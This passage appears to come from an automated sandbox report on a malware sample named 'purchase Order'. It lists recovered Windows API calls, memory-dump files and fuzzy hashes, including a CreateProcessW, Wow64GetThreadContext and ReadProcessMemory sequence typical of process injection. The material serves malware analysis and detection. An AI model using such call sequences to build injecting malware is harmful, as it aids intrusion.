                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C5D28B,SwapMouseButtons,00000004,?), ref: 00C5D2BC
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C5D28B,SwapMouseButtons,00000004,?,?,?,?,00C5C865), ref: 00C5D2DD
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,00C5D28B,SwapMouseButtons,00000004,?,?,?,?,00C5C865), ref: 00C5D2FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: acab7c9eb1f6653f5e26c355f201fc30d55dcd560e78d53c4a7f667e42724e90
                                                        • Instruction ID: c787e633d6df3ff569a22bbc76014ffee79383b20d5506095826707fb4716f3d
                                                        • Opcode Fuzzy Hash: acab7c9eb1f6653f5e26c355f201fc30d55dcd560e78d53c4a7f667e42724e90
                                                        • Instruction Fuzzy Hash: AC113CB9611309BFDB208FA8CC85EAF7BB8EF44745F104469E806D7120D6319E859B65
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 017CC8B3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017CC949
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017CC96B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1397127404.00000000017CA000.00000040.00000020.00020000.00000000.sdmp, Offset: 017CA000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_17ca000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                        • Instruction ID: 5404f68b77e616a636d31d1ecbdaa470de4fa350755c433336d05ad93f8edf30
                                                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                        • Instruction Fuzzy Hash: C5620A30A142189BEB24CFA4C854BDEB772EF58700F1091ADD20DEB394E7759E81CB59
                                                        APIs
                                                          • Part of subcall function 00C44517: _fseek.LIBCMT ref: 00C4452F
                                                          • Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C65D
                                                          • Part of subcall function 00C8C56D: _wcscmp.LIBCMT ref: 00C8C670
                                                        • _free.LIBCMT ref: 00C8C4DD
                                                        • _free.LIBCMT ref: 00C8C4E4
                                                        • _free.LIBCMT ref: 00C8C54F
                                                          • Part of subcall function 00C61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C67A85), ref: 00C61CB1
                                                          • Part of subcall function 00C61C9D: GetLastError.KERNEL32(00000000,?,00C67A85), ref: 00C61CC3
                                                        • _free.LIBCMT ref: 00C8C557
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                        • Instruction ID: bbf693b815437f71d8c0043edafe9b1d43d20a23ca20899eb3e7094ccb28ec2a
                                                        • Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
                                                        • Instruction Fuzzy Hash: 6D515EB1904218AFDF249F64DC81BADBBB9FF48304F1044AEF619A3241DB715E809F68
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C5EBB2
                                                          • Part of subcall function 00C451AF: _memset.LIBCMT ref: 00C4522F
                                                          • Part of subcall function 00C451AF: _wcscpy.LIBCMT ref: 00C45283
                                                          • Part of subcall function 00C451AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C45293
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00C5EC07
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C5EC16
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CB3C88
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 788f4fd93c218a9382b4058c07b84e86a5d2aaefb129f0c12386222f2afa4817
                                                        • Instruction ID: dc1407b4a9a6d51beb791ed31ce9c541b66a423ab685c35d305cd9a9f5964037
                                                        • Opcode Fuzzy Hash: 788f4fd93c218a9382b4058c07b84e86a5d2aaefb129f0c12386222f2afa4817
                                                        • Instruction Fuzzy Hash: 672107745047849FE7378B68C859BEBBFEC9B01308F04049DE69E66281C3706B84CB11
                                                        APIs
                                                        • _memset.LIBCMT ref: 00CB3725
                                                        • GetOpenFileNameW.COMDLG32 ref: 00CB376F
                                                          • Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F
                                                          • Part of subcall function 00C440A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C440C6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: a2141aa12d67f3f80248dd80ee15125a0ca6accf14022283fe3162c24447c90d
                                                        • Instruction ID: 2fad19aa262e14043f77fb1748b6f32112c10aa4c521d00dd8d83e03a56f009c
                                                        • Opcode Fuzzy Hash: a2141aa12d67f3f80248dd80ee15125a0ca6accf14022283fe3162c24447c90d
                                                        • Instruction Fuzzy Hash: 5321D5B1A00288ABCF05DF98C845BEE7BF9AF49304F104059E505B7241DBB49A899F62
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00C8C72F
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C8C746
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 495b3dc5e754468a05394b8e31b67aa93661bf98e99dc6729ed89bf22beaa922
                                                        • Instruction ID: 42a510b2fd2157ce1020af270a945dd5161256c4e6d516e5cfc2da56c1ea7e20
                                                        • Opcode Fuzzy Hash: 495b3dc5e754468a05394b8e31b67aa93661bf98e99dc6729ed89bf22beaa922
                                                        • Instruction Fuzzy Hash: 9DD05E7150030EBBDB50AB90DC0EF9AB76C9700704F0001B0B751A50B1DAB0EA998B55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c7fe3bab9093db691dc8054790df0716384d27ba1879fb01ba9475e8631e01b
                                                        • Instruction ID: 82f1d0736ebbde1c6772b8eb799d108b27dc24a6fb29718c4c67bc4e2cab8098
                                                        • Opcode Fuzzy Hash: 4c7fe3bab9093db691dc8054790df0716384d27ba1879fb01ba9475e8631e01b
                                                        • Instruction Fuzzy Hash: D3F159716083019FCB10DF24C885B5EB7E5FF89314F14896EF9A59B292DB30E946CB82
                                                        APIs
                                                        • _memset.LIBCMT ref: 00C45022
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C450CB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell__memset
                                                        • String ID:
                                                        • API String ID: 928536360-0
                                                        • Opcode ID: 2e8348505fbe8261cd32138be4742190ae2cb14dd41737acccc8cae43db48687
                                                        • Instruction ID: 75b975ca955ae6f68273bc434d01487abad251ef4bf9cbf47b8739ffaf1b6a34
                                                        • Opcode Fuzzy Hash: 2e8348505fbe8261cd32138be4742190ae2cb14dd41737acccc8cae43db48687
                                                        • Instruction Fuzzy Hash: E5314CB55047019FD725DF64D88579BBBE4FB48308F00092EE69EC7251E771AA44CBA2
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00C63973
                                                          • Part of subcall function 00C681C2: __NMSG_WRITE.LIBCMT ref: 00C681E9
                                                          • Part of subcall function 00C681C2: __NMSG_WRITE.LIBCMT ref: 00C681F3
                                                        • __NMSG_WRITE.LIBCMT ref: 00C6397A
                                                          • Part of subcall function 00C6821F: GetModuleFileNameW.KERNEL32(00000000,00D00312,00000104,00000000,00000001,00000000), ref: 00C682B1
                                                          • Part of subcall function 00C6821F: ___crtMessageBoxW.LIBCMT ref: 00C6835F
                                                          • Part of subcall function 00C61145: ___crtCorExitProcess.LIBCMT ref: 00C6114B
                                                          • Part of subcall function 00C61145: ExitProcess.KERNEL32 ref: 00C61154
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        • RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 5da762a45d6e81d39ef293128e0bdee7c0fd218a76b32bb4ab348026f4864421
                                                        • Instruction ID: 20da1e31a99c63e4de84bca1633c63a7da7b18aa331df0547d5987fa1ab1a85a
                                                        • Opcode Fuzzy Hash: 5da762a45d6e81d39ef293128e0bdee7c0fd218a76b32bb4ab348026f4864421
                                                        • Instruction Fuzzy Hash: 9901F931345741AAE6313B25ECC6B2E3358DF82725F280125F515D72D1DFB0DE005E60
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C8C385,?,?,?,?,?,00000004), ref: 00C8C6F2
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C8C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C8C708
                                                        • CloseHandle.KERNEL32(00000000,?,00C8C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C8C70F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: f9f77ed0e9e1058b6eb3c9039bb7ed02393f967baa81a4bc68ffad99b7bb0564
                                                        • Instruction ID: cfb4c55e2fc5dfbb6247ea94822f6f396a4f97c49654716dcb0c816309818267
                                                        • Opcode Fuzzy Hash: f9f77ed0e9e1058b6eb3c9039bb7ed02393f967baa81a4bc68ffad99b7bb0564
                                                        • Instruction Fuzzy Hash: 17E08632140214B7D7212B54EC0DFCE7B28AB45770F144120FB25790E097B126118798
                                                        APIs
                                                        • _free.LIBCMT ref: 00C8BB72
                                                          • Part of subcall function 00C61C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00C67A85), ref: 00C61CB1
                                                          • Part of subcall function 00C61C9D: GetLastError.KERNEL32(00000000,?,00C67A85), ref: 00C61CC3
                                                        • _free.LIBCMT ref: 00C8BB83
                                                        • _free.LIBCMT ref: 00C8BB95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                        • Instruction ID: 94955c15c409ae0a418005e3d46956bf4e1ba37e0ea7351a55ed8d9766c4b5b5
                                                        • Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
                                                        • Instruction Fuzzy Hash: 03E012A164175157DA3475796E84EB713CC4F0435671C0C1DB86AE7146DF24FD4096AC
                                                        APIs
                                                          • Part of subcall function 00C422A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C424F1), ref: 00C42303
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C425A1
                                                        • CoInitialize.OLE32(00000000), ref: 00C42618
                                                        • CloseHandle.KERNEL32(00000000), ref: 00CB503A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 3815369404-0
                                                        • Opcode ID: ad9b605d507f876e56c83b731e7dad1432b5c4d45878aabab774c175c716798d
                                                        • Instruction ID: cae55e2420fac29bb88cd9b82ab423429e5133d408ad7c142b42d45dcce103e5
                                                        • Opcode Fuzzy Hash: ad9b605d507f876e56c83b731e7dad1432b5c4d45878aabab774c175c716798d
                                                        • Instruction Fuzzy Hash: DC717DBC9013858BC704EF6AAD96799BBE4BB99344790426EE10EC77B1CB704444DF39
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00C43A73
                                                          • Part of subcall function 00C61405: __lock.LIBCMT ref: 00C6140B
                                                          • Part of subcall function 00C43ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C43AF3
                                                          • Part of subcall function 00C43ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C43B08
                                                          • Part of subcall function 00C43D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00C43AA3,?), ref: 00C43D45
                                                          • Part of subcall function 00C43D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00C43AA3,?), ref: 00C43D57
                                                          • Part of subcall function 00C43D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00D01148,00D01130,?,?,?,?,00C43AA3,?), ref: 00C43DC8
                                                          • Part of subcall function 00C43D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00C43AA3,?), ref: 00C43E48
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C43AB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 924797094-0
                                                        • Opcode ID: 6432a7b3efb325c65a31047b869817b4c6a7007ddca05bbc5dea87f87e9c435f
                                                        • Instruction ID: 3e6472558e95510267b5cef6ae486cebc2e1915a9e3e1ba21e86f3a3c40fb744
                                                        • Opcode Fuzzy Hash: 6432a7b3efb325c65a31047b869817b4c6a7007ddca05bbc5dea87f87e9c435f
                                                        • Instruction Fuzzy Hash: 7D1190759043419FD300EF65E845A1EFBE9FB94750F00891EF889C72A1DB709584DBA2
                                                        APIs
                                                        • ___lock_fhandle.LIBCMT ref: 00C6EA29
                                                        • __close_nolock.LIBCMT ref: 00C6EA42
                                                          • Part of subcall function 00C67BDA: __getptd_noexit.LIBCMT ref: 00C67BDA
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                        • String ID:
                                                        • API String ID: 1046115767-0
                                                        • Opcode ID: 057ef0ab9b9fb6e554f553e334acfe6dc3fe1512530245e55c7b2339550ddd0f
                                                        • Instruction ID: 2787db7736f63988ac9b263c3d84cca93a876db254064e5f84c575ce3aa25049
                                                        • Opcode Fuzzy Hash: 057ef0ab9b9fb6e554f553e334acfe6dc3fe1512530245e55c7b2339550ddd0f
                                                        • Instruction Fuzzy Hash: AD11C2768056109BD731BFA4D8C53587EA16F81335F2A0741E4745F2E3CBB48940BAA5
                                                        APIs
                                                          • Part of subcall function 00C6395C: __FF_MSGBANNER.LIBCMT ref: 00C63973
                                                          • Part of subcall function 00C6395C: __NMSG_WRITE.LIBCMT ref: 00C6397A
                                                          • Part of subcall function 00C6395C: RtlAllocateHeap.NTDLL(015C0000,00000000,00000001,00000001,00000000,?,?,00C5F507,?,0000000E), ref: 00C6399F
                                                        • std::exception::exception.LIBCMT ref: 00C5F51E
                                                        • __CxxThrowException@8.LIBCMT ref: 00C5F533
                                                          • Part of subcall function 00C66805: RaiseException.KERNEL32(?,?,0000000E,00CF6A30,?,?,?,00C5F538,0000000E,00CF6A30,?,00000001), ref: 00C66856
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 1cb021df49e4bc4e78af391ed25a954eb2345ea95811cda5381dd6e0eb85ec45
                                                        • Instruction ID: 66c2f5eff6d2465544e35ed2d2427395cb7c13d48a06fdee2a2a1ed75113f310
                                                        • Opcode Fuzzy Hash: 1cb021df49e4bc4e78af391ed25a954eb2345ea95811cda5381dd6e0eb85ec45
                                                        • Instruction Fuzzy Hash: 7EF0F47500020D67DB19BFA9D841AEE77AC9F00314F60443DFE0992181DBB0D7C5A6A9
                                                        APIs
                                                          • Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E
                                                        • __lock_file.LIBCMT ref: 00C63629
                                                          • Part of subcall function 00C64E1C: __lock.LIBCMT ref: 00C64E3F
                                                        • __fclose_nolock.LIBCMT ref: 00C63634
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 3cac8c6a2425ac8fdd59d15cbe8e6ba852722e9b6d7f87c8c9406b05afaa4aac
